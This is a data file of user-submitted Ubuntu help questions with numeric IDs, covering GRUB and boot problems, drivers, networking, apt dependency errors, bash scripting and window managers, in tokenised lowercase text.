376380	unable to adjust screen brightness on acer extensa 5635z ( ubuntu 13.10 )	i 'm unable to adjust my screen brightness since i installed ubuntu 13.10 , it was working correctly in 11.04 . i 've already set grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' in /etc/default/grub , but no luck ! ! please help .
376382	ca n't install ubuntu on an asus f5gl laptop	with regards , i tried to install ubuntu 12.04 lts on my asus f5gl and during installation i faced a problem which meant that ubuntu could not find and work with my graphic card , so it stops installation somebody just advised me to go to fg file and write nomodeset i do not know anything about linux and i really love it . please help me to run it on my laptop . thanks in advance , bobby
376384	unable to update to evolution version 3.10.1 ?	i 'm unable to update to the lastest stable version of evolution . i got the .tar.xz file but i can not install it . appreciate your assistance
376385	san disk cruzer glide 32 gb and 8gb ca n't be copied to .	i have ubuntu 12.04 with a kernal of 3.0.0-17-generic ( # 30-ubuntu smp thu mar 8 17:34:21 ut when i tried to copy files to a san disk cruzer 8gb usb drive , the copy process went a short way and then completely stopped . although i have copied items to the usb drive from my pc before , this time the files would start quickly enough but always stop shortly after starting . i figure the 8 gb was bad , so i went and got a brand new 32 gb usb drive from a store , unpackaged it and plugged it in , still unable to copy to the usb drive . so is there some kind of incompatibility or issue where san disk cruzer glides are no longer supporting it . is there an obscure setting that i am missing ? any help would be appreciated
376387	how to count and display number of all files in any working directory ?	i am looking for a command to count and display the number of files in any working directory . further i want to set alias noaf for the command . i have searched for it a lot . i found the following : ls -1|wc -l but it only counts the files . so please can anyone help me ?
376392	lost desktop settings in kde	after next unsuccessful attempt to install ati fglrx drivers , when i also changed grub config a bit grub_cmdline_linux_default= '' radeon.modeset=0 and grub_cmdline_linux= '' nomodeset '' when i restored everything to default - uninstalled fglrx restored default values in grub config and xorg.conf kde logged me into completely new desktop , with ( i suppose ) default configuration . is there a way to restore my previous desktop settings ? what could be the cause ? solved : something was messed out with display settings . search for 'display configuration ' and there deselect one display . or is there a better option ?
376396	static ip address on ubuntu 12.04 virtual machine	i 've setup a vm running ubuntu 12.04 specifically for local web development and am having some problems ensuring it has a static ip address . a static ip address is important as i 'm using the ip address in my hosts file to assign a .local suffix to addresses used both in browser and to connect to the correct database on the vm . currently , every time i connect to a new network or my vm is assigned a new ip address i need to reconfigure my whole environment which is becoming quite a pain . it also probably does n't help that the default-lease-time on the ubuntu vm is set to 1800 by default . at the moment i 'm using vmware fusion and the network adapter is enabled and set to `` autodetect '' under bridged networking . i 've tried to set a static ip address within the dhcpd.conf using the code below : host ubuntu { hardware ethernet 00:50:56:35:0f : f1 ; fixed-address : 192.168.100.100 ; } the fixed-address that i 've used is also outside the range specified in the subnet block ( which in this case is 192.168.100.128 to 192.168.100.254 ) . i 've tried adding and removing the network adapter and restarting my mac after each time to no avail . below is an ifconfig of the vm that might be of some help : eth0 link encap : ethernet hwaddr 00:50:56:35:0f : f1 inet addr:192.168.0.25 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :250:56ff : fe35 : ff1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1624 errors:0 dropped:0 overruns:0 frame:0 tx packets:416 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:147348 ( 147.3 kb ) tx bytes:41756 ( 41.7 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) are there any specific issues with 12.04 that i 'm missing ? otherwise has anyone else got any ideas ? thanks in advance .
376397	kbuntu clock showing time in utc	my clock suddenly started showing time in utc , apparently this started after an update . i reset my timezone from the adjust date and time ... settings and used dpkg-reconfigure tzdata but the time is still shown in utc . the file /etc/localtime seems to contain the correct information ( judging by the readable characters in it ) . how do i tell the clock to use my timezone ?
376398	ubuntu software center not opening after upgrading to 13.10 from 13.10	screenshot of what i got in the terminal when i tried to reinstall the ubuntu software center :
376399	ubuntu 12.04 does not start	im using lenovo g580 . i installed win7 first , two months ago . now , i want to install ubuntu 12.04 . i used usb for installation . it went very well , but when i was reboot laptop after installation , it started win7 not ubuntu or bootloader for choice . liveubuntu is working very well . i tried install ubuntu a couple of times from other .iso . i tried recover grub . when i change `` boot '' flag in gparted to partition with ubuntu , bios show me error `` missing operating system '' . ( `` boot '' flag is optionally on windows partition c : / ) . can it be hardware mistake ? or i did some mistakes ?
376402	proxy authentication ubuntu 13.04	i am newly installed the ubuntu 13.04. then i am connected the network , through wired , wireless , and mobile broad band . after every time i can do the firefox log on but i cant update software and i cant down load new software . software updater had this massage , **check your internet connection . ** w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/main/source/sources 407 proxy authentication required , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/main/binary-i386/packages 407 proxy authentication required , e : some index files failed to download . they have been ignored , or old ones used instead . now how can create my settings ? please help me . thanks .
376404	how to make text file created in ubuntu compatible with windows notepad ?	sometime i have to use the text files created in ubuntu using editors like gedit , nano , vi , emacs or others , in windows . so basically when ever i create a text file in ubuntu i append the extension .txt , and it does make the file open in windows very easily . but the actual problem is the text files created in ubuntu are so difficult to understand ( read ) when opened in windows ' notepad . no matter how many lines have been used , all the lines appear in the same one line . is there a easy way to save the text files in ubuntu 's basic editors so that it can be seen exactly the same in windows ' notepad ?
376405	binary package for gcc 4.8.2 on ubuntu 12.04 ?	following this answer , i have installed gcc 4.8.1 on ubuntu 12.04 a couple of months ago . unfortunately , i encounter bugs very frequently , varying from failing to compile valid programs to crashing . with one exception , i have been unable to reduce to a minimal sample and report the errors . i believe all are related to new c++11 features , mostly template aliases . now that gcc 4.8.2 is out , i would like to upgrade as soon as possible , but i would really prefer to do so with a binary package ; my previous attempts to compile from source have failed . i have seen how to compile from source specifically for ubuntu 12.04 but i have not tried yet . i have also seen there 's a binary package for ubuntu 14.04 but it does not appear to work on my 12.04 , at least without removing my current installation of gcc 4.8.1 . so , is there any information whether a binary package of gcc 4.8.2 will be available for ubuntu 12.04 , and when ?
376407	history command showing the directory and the date	is there a way to have in the .bash_history file , listed : the directory where the command has been typed , the date , and the command ?
376408	failed to execute child process ? anyone know a fix for this ?	i changed something that i did not mean to change and now everytime i try to open firefox it says : could not launch application , failed to execute child process `` firefox '' ( no such file or directory ) . aybody know a fix for this ? i am using backtrack 5 r3 with gnome , which is based off of ubuntu 10.04 .
376414	dell inspiron 3521 wifi not working after upgrade 12.04	wi-fi wireless problem with dell 3521 after general upgrade on 12.04 . system diagnostics -- > all test passed . network test fails : with msg http connection error . earlier it was working but so , e system upgrade was asked by system and i did it and it 's not working now . thanks in advance
376415	switch dns by command-line ? ( like google dns/opendns < - > whatever the system default is )	how do i switch dns by command-line ? i mean like , changing between google dns or opendns and whatever the system default is .
376422	ubuntu slower than debian on 512 mb ram	so , i am using ubuntu 12.04 lts . my system details are in the screenshot . my ubuntu is very slow for me , i mean that when i try to open any application , it takes 3-4 seconds but debian took 1 sec . also , sometimes when i go to settings or software center , or any other place , i find that the systems hangs and the windows dims for 10 seconds
376423	opencv install problems on studio 12.04 - broken dependencies	problem : i 'm trying to install opencv ( video analytics ) and am following the ubuntu opencv installation documentation . the provided script has a line which executed for some time , taking away more packages than i expected ( such as ubuntu-studio video ) : sudo apt-get -qq remove ffmpeg x264 libx264-dev when the script gets to the line below , it bombs : sudo apt-get -qq install libopencv-dev build-essential checkinstall cmake pkg-config yasm libtiff4-dev libjpeg-dev libjasper-dev libavcodec-dev libavformat-dev libswscale-dev libdc1394-22-dev libxine-dev libgstreamer0.10-dev libgstreamer-plugins-base0.10-dev libv4l-dev python-dev python-numpy libtbb-dev libqt4-dev libgtk2.0-dev libfaac-dev libmp3lame-dev libopencore-amrnb-dev libopencore-amrwb-dev libtheora-dev libvorbis-dev libxvidcore-dev x264 v4l-utils ffmpeg the error messsage is : e : unable to correct problems , you have held broken packages . attempted solutions : i first ran update-manager , ran sudo apt-get update , rebooted , tried to run the above script line manually , and still no change . thereafter followed the answers given at : how do i resolve unmet dependencies ? i ran sudo apt-get install -f and nothing seemed to change . it did mention that some packages were no longer needed and could be removed by apt-get autoremove , so i ran that . it removed a number of packages , so i reran the install command above . still same problem of held broken packages . i then ran sudo apt-get -u dist-upgrade , part of the resulting response was : the following packages have been kept back : gstreamer0.10-ffmpeg i 'm not sure what that means . i do know that it shows up in my update-manager and can not be checked . i then ran sudo dpkg -- configure -a and then reran sudo apt-get -f install and the package was still not upgraded , though there was this very interesting comment ; some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gstreamer0.10-ffmpeg : depends : libavcodec53 ( < 5:0 ) but it is not going to be installed or libavcodec-extra-53 ( < 5:0 ) but 5:0.7.2-1ubuntu1+codecs1~oneiric2 is to be installed e : unable to correct problems , you have held broken packages . then i ran sudo apt-get -u dist-upgrade it showed i had one held package , so i ran sudo apt-get -o debug : :pkgproblemresolver=yes dist-upgrade it also exited without upgrading the package , so i ran sudo apt-get remove -- dry-run gstreamer0.10-ffmpeg : i386 and it gave me : *the following packages will be removed : arista gstreamer0.10-ffmpeg 0 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . remv arista [ 0.9.7-3ubuntu1 ] remv gstreamer0.10-ffmpeg [ 0.10.12-1ubuntu1 ] * but when i reran sudo apt-get -u dist-upgrade it showed the package was still there . *the following packages have been kept back : gstreamer0.10-ffmpeg 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . * thereafter , went into synaptic pm and completely removed gstreamer0.10-ffmpeg . reran sudo apt-get -u dist-upgrade and was told 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . however , when i ran the original apt-get command to install opencv ( first code at the top of this question ) , it still gave me the same broken package errors . so i tried : $ cat /etc/apt/sources.list # # deb cdrom : [ ubuntu-studio 11.10 _oneiric ocelot_ - release i386 ( 20111011.1 ) ] / oneiric main multiverse restricted universe # deb cdrom : [ ubuntu-studio 11.10 _oneiric ocelot_ - release i386 ( 20111011.1 ) ] / oneiric main multiverse restricted universe # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise universe deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu oneiric partner # # uncomment the following two lines to add software from ubuntu's # # 'extras ' repository . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu oneiric main # deb-src http : //extras.ubuntu.com/ubuntu oneiric main # deb http : //download.opensuse.org/repositories/home : /popinet/xubuntu_11.04 ./ # disabled on upgrade to precise thereafter , i ran : $ sudo apt-get check reading package lists ... done building dependency tree reading state information ... done however , no resolution of the problem yet , as i still get the same broken package message when i attempt to run the install of opencv with this command : sudo apt-get -qq install libopencv-dev build-essential checkinstall cmake pkg-config yasm libtiff4-dev libjpeg-dev libjasper-dev libavcodec-dev libavformat-dev libswscale-dev libdc1394-22-dev libxine-dev libgstreamer0.10-dev libgstreamer-plugins-base0.10-dev libv4l-dev python-dev python-numpy libtbb-dev libqt4-dev libgtk2.0-dev libfaac-dev libmp3lame-dev libopencore-amrnb-dev libopencore-amrwb-dev libtheora-dev libvorbis-dev libxvidcore-dev x264 v4l-utils ffmpeg i then ran : $ sudo apt-get autoclean reading package lists ... done building dependency tree reading state information ... done del linux-generic 3.2.0.55.65 [ 1,714 b ] del linux-libc-dev 3.2.0-54.82 [ 858 kb ] del initramfs-tools-bin 0.99ubuntu13.2 [ 9,758 b ] del firefox-globalmenu 24.0+build1-0ubuntu0.12.04.1 [ 8,958 b ] del apport 2.0.1-0ubuntu17.5 [ 147 kb ] del firefox-locale-en 24.0+build1-0ubuntu0.12.04.1 [ 578 kb ] del thunderbird-locale-en-gb 1:24.0+build1-0ubuntu0.12.04.1 [ 14.0 kb ] del linux-libc-dev 3.2.0-55.85 [ 860 kb ] del thunderbird-globalmenu 1:24.0+build1-0ubuntu0.12.04.1 [ 8,782 b ] del apport-gtk 2.0.1-0ubuntu17.5 [ 9,200 b ] del thunderbird 1:24.0+build1-0ubuntu0.12.04.1 [ 29.3 mb ] del firefox 24.0+build1-0ubuntu0.12.04.1 [ 28.1 mb ] del thunderbird-locale-en-us 1:24.0+build1-0ubuntu0.12.04.1 [ 14.0 kb ] del linux-image-generic 3.2.0.54.64 [ 2,262 b ] del linux-headers-generic 3.2.0.55.65 [ 2,244 b ] del linux-image-generic 3.2.0.55.65 [ 2,260 b ] del python-apport 2.0.1-0ubuntu17.5 [ 81.1 kb ] del initramfs-tools 0.99ubuntu13.2 [ 49.2 kb ] del linux-headers-generic 3.2.0.54.64 [ 2,258 b ] del linux-headers-lowlatency-pae 3.2.0.55.44 [ 2,256 b ] del linux-headers-lowlatency-pae 3.2.0.54.43 [ 2,250 b ] del thunderbird-locale-en 1:24.0+build1-0ubuntu0.12.04.1 [ 342 kb ] del python-problem-report 2.0.1-0ubuntu17.5 [ 9,466 b ] del procps 1:3.2.8-11ubuntu6.2 [ 225 kb ] del linux-generic 3.2.0.54.64 [ 1,722 b ] but when i run the opencv install command , i still get : e : unable to correct problems , you have held broken packages . so then i started almost completely over again , this time adding back in repositories that the upgrade to precise had disabled . then i reran the following commands : $ sudo apt-get autoclean reading package lists ... done building dependency tree reading state information ... done $ sudo apt-get clean $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : python-gudev use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : python-gudev 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . after this operation , 106 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 614874 files and directories currently installed . ) removing python-gudev ... processing triggers for python-support ... $ sudo dpkg -- configure -a $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ sudo apt-get -u dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ cat /etc/apt/sources.list.d/* # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/earth/deb/ stable main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/earth/deb/ stable main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/earth/deb/ stable main # deb http : //ppa.launchpad.net/kxstudio-team/ppa/ubuntu precise main # disabled on upgrade to precise # deb-src http : //ppa.launchpad.net/kxstudio-team/ppa/ubuntu precise main # disabled on upgrade to precise deb http : //ppa.launchpad.net/kxstudio-team/ppa/ubuntu oneiric main deb-src http : //ppa.launchpad.net/kxstudio-team/ppa/ubuntu oneiric main # deb http : //ppa.launchpad.net/kxstudio-team/ppa/ubuntu precise main # disabled on upgrade to precise # deb-src http : //ppa.launchpad.net/kxstudio-team/ppa/ubuntu precise main # disabled on upgrade to precise # # please report any bug on https : //bugs.launchpad.net/medibuntu/ # deb http : //packages.medibuntu.org/ precise free non-free # medibuntu - ubuntu 11.10 `` oneiric ocelot '' disabled on upgrade to precise # deb-src http : //packages.medibuntu.org/ oneiric free non-free # medibuntu ( source ) - ubuntu 11.10 `` oneiric ocelot '' # # please report any bug on https : //bugs.launchpad.net/medibuntu/ deb http : //packages.medibuntu.org/ oneiric free non-free # medibuntu - ubuntu 11.10 `` oneiric ocelot '' # deb-src http : //packages.medibuntu.org/ oneiric free non-free # medibuntu ( source ) - ubuntu 11.10 `` oneiric ocelot '' # # please report any bug on https : //bugs.launchpad.net/medibuntu/ # deb http : //packages.medibuntu.org/ precise free non-free # medibuntu - ubuntu 11.10 `` oneiric ocelot '' disabled on upgrade to precise # deb-src http : //packages.medibuntu.org/ oneiric free non-free # medibuntu ( source ) - ubuntu 11.10 `` oneiric ocelot '' # deb http : //www.openfoam.org/download/ubuntu precise main # disabled on upgrade to precise deb http : //www.openfoam.org/download/ubuntu oneiric main # deb http : //www.openfoam.org/download/ubuntu precise main # disabled on upgrade to precise deb http : //ppa.launchpad.net/webupd8team/java/ubuntu precise main deb-src http : //ppa.launchpad.net/webupd8team/java/ubuntu precise main deb http : //ppa.launchpad.net/webupd8team/java/ubuntu precise main deb-src http : //ppa.launchpad.net/webupd8team/java/ubuntu precise main result : but i still get this error when i try to run the opencv install command : e : unable to correct problems , you have held broken packages . what else do i need to do ? will an upgrade to ubuntu studio 13.xx solve this problem ( or compound it ) ?
376424	windows 8 not able to boot along with ubuntu 13.10	i installed ubuntu 13.10 along with windows 8 . ubuntu works fine , but when i try to open windows 8 from grub loader the screen turns black and within 3 seconds the same grub loader appears again . how to boot my windows 8 ?
376426	gtk-warning : calling inhibit failed	i was trying to use gedit , when i came across the following problem : mypc @ tm77 : ~ $ sudo gedit /etc/pm/config.d/config ( gedit:12512 ) : ibus-warning ** : the owner of /home/mypc/.config/ibus/bus is not root ! ( gedit:12512 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files what is happening ?
376428	hd serial at /dev/disk/by-id	i am building a function that has to read the hd serial number , and it can not run external applications or require root privileges . i am aware that i can list the contents of this folder : /dev/disk/by-id my question is , is this folder standard in every linux distribution ? is it persistent , do the contents of this folder change over time ? also , is there any common pattern ? i suppose i can always extract the link to sda ( ignoring sda1 , etc. ) . for example , in a linux machine i get something like this when i do ls -la : ata-st500nm0011_z1m0cdvs - > ../../sda ata-st500nm0011_z1m0cdvs-part1 - > ../../sda1 ... scsi-1ata_st500nm0011_z1m0cdvs - > ../../sda ... scsi-sata_st500nm0011_z1m0cdvs - > ../../sda ... wwn-0x5000c500405b477d - > ../../sda ... in others there are only ata- , scsi-sata and wwn . what does these mean ? will i always find at least three of the four above ? thanks !
376429	timeout has no effect	i 'm running a php application that executes pdftk to concatenate pdf files . for some pdf files pdftk hangs . to make the process end i 'm using timeout . the command gets executed using the php function shell_exec . this works with php -a but not within apache2- > suphp- > php-cgi . may be it works and just sometimes it does not . the executed command looks like this : shell_exec ( '/usr/bin/timeout -s15 60 /usr/bin/timeout -s9 30 /usr/bin/pdftk /path/to/pdf1.pdf /path/to/pdf2 /path/to/pdf3 output - ' ) ;
376431	broadcom 43142 : wireless network not enabeling	when i try to type : sudo modprobe wl following error is diplayed fatal : module wl not found . i have follwed alot of other methods on this group still the same , i am on ubuntu 12.10
376432	how to give loop variable i in the cut command ?	while [ `` $ i '' -lt `` $ b '' ] do export file= $ ( echo $ a | cut -f $ i -d ' ' ) echo $ file export i=`echo $ i + 1` done my variable `` a '' has ab cd ef and so on . i need to take the words from first word to last word one at each time when loops . this should be done based on the i value , ex : when i=1 i should get first word , when i=2 i should get second word and so on . can somebody please help me ?
376434	from where can i download ubuntu 12.04	from where can i download ubuntu 12.04 only . not even 12.04.* . i want only 12.04 lts . i tried to download from ubuntu cd images , but there is only 12.04.3 because 12.04 . * and all later versions has lots of critical bugs , like : wi-fi hotspot does n't work usb 3g datacard does n't work when i connects to any wi-fi network all other connected system on same wi-fi network does n't access internet even network printer . this is unbelievable , but its happening ! startup disk creator does n't work empathy does n't connect to any account properly and many things all later versions of ubuntu are totally worst .
376435	bridged connection from win8 over ethernet not working	right then , ive just dont a fresh install on a old laptop and am needing to download the proptirtary drivers to get the wifi card going . so ive set up a bridged connection from my win8 laptop over ethernet to the old laptop but its still not working . prior to moving to ubuntu i was using the laptop as a wifi bridge for my win 8 desktop all i need to do now reverse the process . but its not as easy as it was in vista and we all know how bad that is : /
376437	ca n't work out security	i installed ubuntu on puter i am the only user i alone use . i was trying a to find out how to repair hardware faults . surprised to find i was not the owner and that there is a password that locks me out . i only set one password during set up so what is this mysterious password . as far as i 'm concerned it is overdone on security , im sick of authenticating every 3 seconds . i need a simpler system
376439	taking the input and output of a terminal	how can i take the input and the output of a terminal ? to be more specific , what i want to do is to take everything that is typed in the terminal , and everything that the `` terminal '' types ( in real time ) .
376446	firefox scrolls up and down when i press the arrows	when i push down the arrow key in my keyboard , firefox scrolls site to its bottom . how can i configure firefox to scroll smoothly , so that i can see couple of new lines as i press the key ? i have firefox 25.0 and ubuntu 13.10 . i tried to reinstall firefox and in preferences i chose smooth auto scrolling . it looks like there is a cursor in the www-site i 'm watching and by pressing keys the cursor jump between different links .
376448	external hdd not detected . 12.04 lts	i have exactly the same problem as this : external hard drives not detected 12.04 lts a brand new western digital elements external hd that worked for about a week is now not being detected . i use this disk for my backup and deja dup was the application that could n't find it in the beginning . on a laptop running ubuntu 10.04 the disk works fine . here is the output of sudo fdisk -l : alex @ alex-desktop : ~ $ sudo fdisk -l disk /dev/sda : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0007efb0 device boot start end blocks id system /dev/sda1 * 2048 3902836735 1951417344 83 linux /dev/sda2 3902838782 3907028991 2095105 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 3902838784 3907028991 2095104 82 linux swap / solaris disk /dev/sdd : 2000.4 gb , 2000396746752 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907024896 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00025262 device boot start end blocks id system /dev/sdd1 2048 3907024895 1953511424 7 hpfs/ntfs/exfat and here is the output of dmesg | tail -n 20 alex @ alex-desktop : ~ $ dmesg | tail -n 20 [ 19404.435910 ] usb 1-3 : usb disconnect , device number 8 [ 19409.668071 ] usb 1-3 : new high-speed usb device number 9 using ehci_hcd [ 19409.805099 ] scsi12 : usb-storage 1-3:1.0 [ 19410.806418 ] scsi 12:0:0:0 : direct-access wd elements 1048 1022 pq : 0 ansi : 6 [ 19410.807902 ] sd 12:0:0:0 : attached scsi generic sg2 type 0 [ 19410.817241 ] sd 12:0:0:0 : [ sdd ] spinning up disk ... ... .ready [ 19414.849634 ] sd 12:0:0:0 : [ sdd ] 3907024896 512-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 19414.851243 ] sd 12:0:0:0 : [ sdd ] write protect is off [ 19414.851250 ] sd 12:0:0:0 : [ sdd ] mode sense : 47 00 10 08 [ 19414.853251 ] sd 12:0:0:0 : [ sdd ] no caching mode page present [ 19414.853259 ] sd 12:0:0:0 : [ sdd ] assuming drive cache : write through [ 19414.859248 ] sd 12:0:0:0 : [ sdd ] no caching mode page present [ 19414.859259 ] sd 12:0:0:0 : [ sdd ] assuming drive cache : write through [ 19414.869015 ] sdd : sdd1 [ 19414.876247 ] sd 12:0:0:0 : [ sdd ] no caching mode page present [ 19414.876255 ] sd 12:0:0:0 : [ sdd ] assuming drive cache : write through [ 19414.876263 ] sd 12:0:0:0 : [ sdd ] attached scsi disk [ 19435.756066 ] end_request : i/o error , dev fd0 , sector 0 [ 20127.996060 ] end_request : i/o error , dev fd0 , sector 0 [ 20518.924054 ] end_request : i/o error , dev fd0 , sector 0 i am very new to ubuntu but do have some legacy unix experience . any help would be appreciated !
376451	how to get work ubuntu and displaylink	according to this i should only update the kernel . who had success with this ? it seems that x-server ( of 12.04lts ) is n't able to handle displylink because the display ( lenovo lt1421 ) only shows bootmessages and terminal . thanks
376453	what is the easiest way to remake the deleted binary file of package ?	i just went through this question and was wondering whether there was a better way to re-create the binary of an installed package , which got deleted somehow . i know i can reinstall the application , but re-installing the complete package is n't necessarily feasible always . p.s . : i am talking about an installed application , so please assume that i do n't have the source code ( it may be open-source but i do n't want to procure the exact source code of the installed version ) .
376456	problems with ubuntu restore	i am trying to restore a folder via the in house ubuntu restore software . i click on the restore version of the folder i want restored and then the restore software starts adn away it goes . but about 60 % of the way through it throws up a failed due to unknown reason ! is there a way round this ? or what am i doing wrong ? ray
376459	installing ubuntu 13.10 on macbook pro 5,1	i 've read a lot of guides and tutorials . so far i have : refind installed and working . downloaded the mac version of the iso . i used this to make a live flash drive ( http : //sevenbits.github.io/mac-linux-usb-loader/ ) i boot off of it and works until it tries to load the kernel , and all i get is a blank screen .
376464	want to remove unlock login key ring when no keyring directory is there ?	recently i lost my root user password . so i had reset it using the recovery terminal . now whenever i login , the ubuntu shows a dialogue box with unlock keyring . i already tried for deleting the keyring folder in the .gnome2 folder but there is no folder related to keyring or anything .
376465	re-installing ubuntu 12.04 using windows installer	i had been using ubuntu till yesterday , and then removed it from a partitioned drive so that i could format the drive for some purpose . then i created a new volume and tried installing ubuntu 12.04 using the windows installer . it installed in the drive perfectly . when i gave the 'reboot now ' option , the system rebooted with windows 7 itself and i did n't get the option of booting ubuntu 12.04 at all . then i restarted the computer just to see windows 7 start again without the boot options . please help me . i have a lenovo thinkpad with 500gb hard drive and windows 7 os
376468	dhcp client issues with 12.04	i have 14 x dell c6100 servers running ubuntu 12.04 lts . they have been running fine for a year . the systems are updated regularly . but now if reboot they fail to get a ip from the dhcp server . in the syslog i see that the dhclient dhcpdiscover on eth0 to 255 ... but still no ip ... the onboard chip is : intel 82576 the dhcp server is also running ubuntu 12.04 lts . any bugs with the dhcp on 12.04 ? ( i have tried disabling ufw )
376471	how do i install and use fluxbox window manager ?	i am using backtrack 5 r3 which is based off ubuntu 10.04 lts . i want to use the fluxbox windows manager if possible . i already tried apt-get install fluxbox , which appeared to work , but i have no clue where it installed to or what to do once i find the installed files . is there an executable file that i click on ? or can i just open it from the terminal ? also would openbox be a better alternative to fluxbox ? would that answer depend on the users needs ? i would have moved this to a discussion but do not know how . i think i am getting some kind of error . the output of /usr/bin/fluxbox is : failed to read : session.ignoreborder setting default value failed to read : session.forcepseudotransparency setting default value failed to read : session.colorsperchannel setting default value failed to read : session.doubleclickinterval setting default value failed to read : session.tabpadding setting default value failed to read : session.stylefile setting default value failed to read : session.styleoverlay setting default value failed to read : session.slitlistfile setting default value failed to read : session.appsfile setting default value failed to read : session.tabsattacharea setting default value failed to read : session.cachelife setting default value failed to read : session.cachemax setting default value failed to read : session.autoraisedelay setting default value failed to read : session.screen0.opaquemove setting default value failed to read : session.screen0.fullmaximization setting default value failed to read : session.screen0.maxignoreincrement setting default value failed to read : session.screen0.maxdisablemove setting default value failed to read : session.screen0.maxdisableresize setting default value failed to read : session.screen0.workspacewarping setting default value failed to read : session.screen0.showwindowposition setting default value failed to read : session.screen0.autoraise setting default value failed to read : session.screen0.clickraises setting default value failed to read : session.screen0.defaultdeco setting default value failed to read : session.screen0.rootcommand setting default value failed to read : session.screen0.tab.placement setting default value failed to read : session.screen0.windowmenu setting default value failed to read : session.screen0.nofocuswhiletypingdelay setting default value failed to read : session.screen0.followmodel setting default value failed to read : session.screen0.userfollowmodel setting default value failed to read : session.screen0.workspaces setting default value failed to read : session.screen0.edgesnapthreshold setting default value failed to read : session.screen0.window.focus.alpha setting default value failed to read : session.screen0.window.unfocus.alpha setting default value failed to read : session.screen0.menu.alpha setting default value failed to read : session.screen0.menudelay setting default value failed to read : session.screen0.menudelayclose setting default value failed to read : session.screen0.tab.width setting default value failed to read : session.screen0.tooltipdelay setting default value failed to read : session.screen0.menumode setting default value failed to read : session.screen0.overlay.linewidth setting default value failed to read : session.screen0.overlay.linestyle setting default value failed to read : session.screen0.overlay.joinstyle setting default value failed to read : session.screen0.overlay.capstyle setting default value failed to read : session.screen0.allowremoteactions setting default value failed to read : session.screen0.clientmenu.usepixmap setting default value failed to read : session.screen0.tabs.usepixmap setting default value failed to read : session.screen0.tabs.maxover setting default value 